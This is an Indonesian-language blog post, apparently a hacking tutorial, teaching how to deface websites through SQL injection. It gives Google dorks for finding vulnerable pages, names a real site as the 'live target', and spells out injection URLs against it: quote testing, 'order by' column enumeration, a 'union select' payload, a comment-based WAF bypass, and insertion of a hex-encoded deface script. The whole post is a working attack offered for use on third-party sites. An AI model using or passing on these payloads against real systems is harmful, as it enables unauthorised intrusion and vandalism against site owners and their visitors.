ASSALAMMUALAIKUM GUYS:)
Kembali lagi dengan gw mimin ganteng ti sunda:v Oke kali ini gw bakal ngasih tutorial cara deface poc Sql injection (print sc deface with jso) . Oke sebelumnya sql injection itu apa si? jadi Sql Injection itu adalah sebuah teknik yang menyalah gunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah web
Bahan bahan yang harus lu sediain:
1. dork
2. Sc inject(sc jso yg udh diinject)
3. Internet
4. kesabaran:v
DORK
- inurl://php?id=
- inurl://news?id=
- inurl://item?id=
bisa kalian racik sendiri aja biar dapet web yang vuln kalo misalkan gk dapet yang vuln.
LIVE TARGET
Oke kita masuk ke cara membuat Sc inject terlebih dahulu.
1. Siapkan Sc jso kalian terlebih dahulu. untuk cara pembuatan sc jso klik INI
2. Salin sc jso yg udh lu buat
3. Buka web http://www.convertstring.com/id/EncodeDecode/HexEncode dan pastekan di kolom pertama lalu klik hex encode. maka akan muncul kode kode kalian salin dan simpen terserah lah dimna
nah dah jadi tuh sc injectnya sekarang kita masuk ke pepesnya
1. dorking di google dah, karena ada live target langsung aja masuk ke live targetnya.
2. Kita tambahkan ' pada akhir link untuk melihat web itu vuln apa engga (https://www.smtmax.com/category.php?id=15')
jika muncul kata SQL berarti web itu vuln
3. Setelah kalian mengetahui web tersebut vuln laluKita tambahkan "+order+by+1--+- " dibelakang linknya
contoh
https://www.smtmax.com/category.php?id=15+order+by+1--+-
ternyata webnya gk error
https://www.smtmax.com/category.php?id=15+order+by+2--+-
https://www.smtmax.com/category.php?id=15+order+by+3--+-
dan seterusnya sampai webnya error
setelah di coba ternyata webnya error di no 15 berarti kolomnya itu ada 14, karena di no 14 tidak error. (https://www.smtmax.com/category.php?id=15+order+by+18--+-)
4. Ubah "+order+by+" Menjadi "+union+select+jumlah kolom"
contoh
https://www.smtmax.com/category.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+-
Jika muncul tulisan " Not Acceptable!" atau "Forbidden" berarti webnya harus di Bypass Waf.
dengan mengganti "+union+select+" menjadi "+/!50000union/+/!50000select/+"
kebetulan live targetnya gk usah di Bypass Waf
5. Nah setelah menambahkan "+union+select+" maka akan muncul angka ajaib, jika angkanya tidak muncul kita tambahkan - setelah =
https://www.smtmax.com/category.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+-
Nah ternyata angka ajaibnya adalah 3
6. Nah selanjutnya kalian Pastekan sc inject kalian di nomor angka ajaib dengan menambahkan "0x" didepan sc injectnya. TARRAAAAAAA muncull dah sc jso kalian
mungkin cukup seklian tutor dari gw, jika kurang faham kalian tanyakan saja di kolom komentar atau langsung liat tutor di video dibawah ini. SEE YOU NEXT TIME GUYS:)
Youtube : Mr ProAL
Post a Comment